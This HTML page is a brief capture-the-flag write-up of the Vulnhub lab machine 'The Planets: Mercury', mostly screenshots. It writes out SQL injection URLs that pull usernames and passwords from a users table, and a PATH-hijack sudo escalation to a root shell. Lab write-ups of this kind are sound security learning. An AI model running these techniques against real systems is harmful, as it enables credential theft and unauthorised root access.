<HTML>
<HEAD>
<!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

<title>Alienum | Stukas</title>
<style>
* {
  box-sizing: border-box;
}

body{
background-color: rgba(0, 0, 0, 0.9);
width: 95%;
}

li a, p, h1, h2{
color:#808080;
}

.tools h1 ,h2{
 padding-left: 50px;
 font-size: 20px;
}

.tools img{
 left: 5%;
 position: relative;
}

.btn-circle {
  height: 47px;
  width: 47px;
  padding: 6px 0px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 25px;
}

.footer{
  position: relative;
  bottom:0;
}

.social{
 position: relative; 
 bottom:0;
 left: 20px;
}

header{
text-align:center;
}
<!------------------menu-------------------->
.topnav {
  overflow: hidden;
  background-color: #333;
}
.topnav a {
  float: left;
  display: block;
  color: #f2f2f2;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
}
.topnav .icon {
  display: none;
}
.topnav a:hover{
  background-color: #555;
  color: white;
}

.gallery img {
  position: relative;
  float:center;
  background-attachment: fixed;  
  box-shadow: 0 4px 8px 0 rgba(99, 173, 118, 0.2), 0 6px 20px 0 rgba(99, 173, 118, 0.9);
  left: 5%;
}

.desc {
  padding: 15px;
  font-size: 20px;
  color:#808080;
  text-align: left;
}

pre {
	background: rgba(0, 0, 0, 0.9);
	border: 10px outset rgba(27, 27, 30, 1);
	padding: 10px;
	font-size: 16px;
	color: #aa759f;
	border-radius: 2px;
	text-wrap: normal;
	overflow: auto;
	overflow-y: hidden;
}


  </style>
	</HEAD>
	<BODY>		
		<nav class="navbar navbar-expand-lg">
			<div class="topnav" id="myTopnav">
				<a class="nav-link" href="../../index.html">Home <span class="sr-only">(current)</span></a>
				<a class="nav-link" href="../../tools.html">Tools</a>
				<a class="nav-link" href="../../vulnhub.html">Vulnhub</a>
				<a class="nav-link" href="../../about.html">About</a>
				<a href="javascript:void(0);" style="font-size:15px;" class="icon" onclick="myFunction()">&#9776;</a>
			</div>					
		</nav>
		
         <header>
		  <h1>The Planets: Mercury, Vulnhub Writeup</h1>
		  <p>Posted by Alienum</p>
		</header> 
		
		<div class="gallery">
		   <p>
		    <div class="desc">Port Scan</div>
			 <img src="1.PNG" style="width:700px; height: 500px;"><br>
		   </p>
		    <p>
		    <div class="desc">Found the /mercuryfacts dir </div>
		    <img src="2.PNG" style="width:800px; height: 400px;"><br><br>
		    <img src="3.PNG" style="width:700px; height: 700px;"><br>
		   </p>
		 <p>
		    <div class="desc">SQL Injection </div>
			<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://10.0.2.5:8080/mercuryfacts/1 UNION SELECT username from users--/</code></pre></div></div><br>
		    <img src="10.PNG" style="width:900px; height:200px;"><br><br><br>
			<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://10.0.2.5:8080/mercuryfacts/1 UNION SELECT password from users--/</code></pre></div></div><br>
		    <img src="11.PNG" style="width:1000px; height:170px;"><br>
		  </p>
		  <p>
		    <div class="desc">SSH Login | webmaster</div>
		    <img src="12.PNG" style="width:800px; height: 350px;"><br><br>
			<img src="13.PNG" style="width:600px; height: 260px;"><br><br>
		    <div class="desc">Privesc to linuxmaster</div>
			<img src="14.PNG" style="width:800px; height: 240px;"><br><br>
			<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 -d</code></pre></div></div>
		     <div class="desc">Privesc to root | thanks to the discord guy (he knows)</div>
			<img src="20.PNG" style="width:800px; height: 240px;"><br><br>
			<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>linuxmaster@mercury:~$ echo "/bin/bash" > tail
linuxmaster@mercury:~$ chmod 777 tail
linuxmaster@mercury:~$ export PATH=.:$PATH
linuxmaster@mercury:~$ sudo PATH=$PATH /usr/bin/check_syslog.sh
root@mercury:/home/linuxmaster#</code></pre></div></div>
<div class="desc">Root proof</div>
			<img src="21.PNG" style="width:400px; height: 400px;">
			</p>	
		</div> 

		
		<script>
			function myFunction() {
			  var x = document.getElementById("myTopnav");
			  if (x.className === "topnav") {
				x.className += " responsive";
			  } else {
				x.className = "topnav";
			  }
			}
		</script>
	
	<!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>

	</BODY>
</HTML>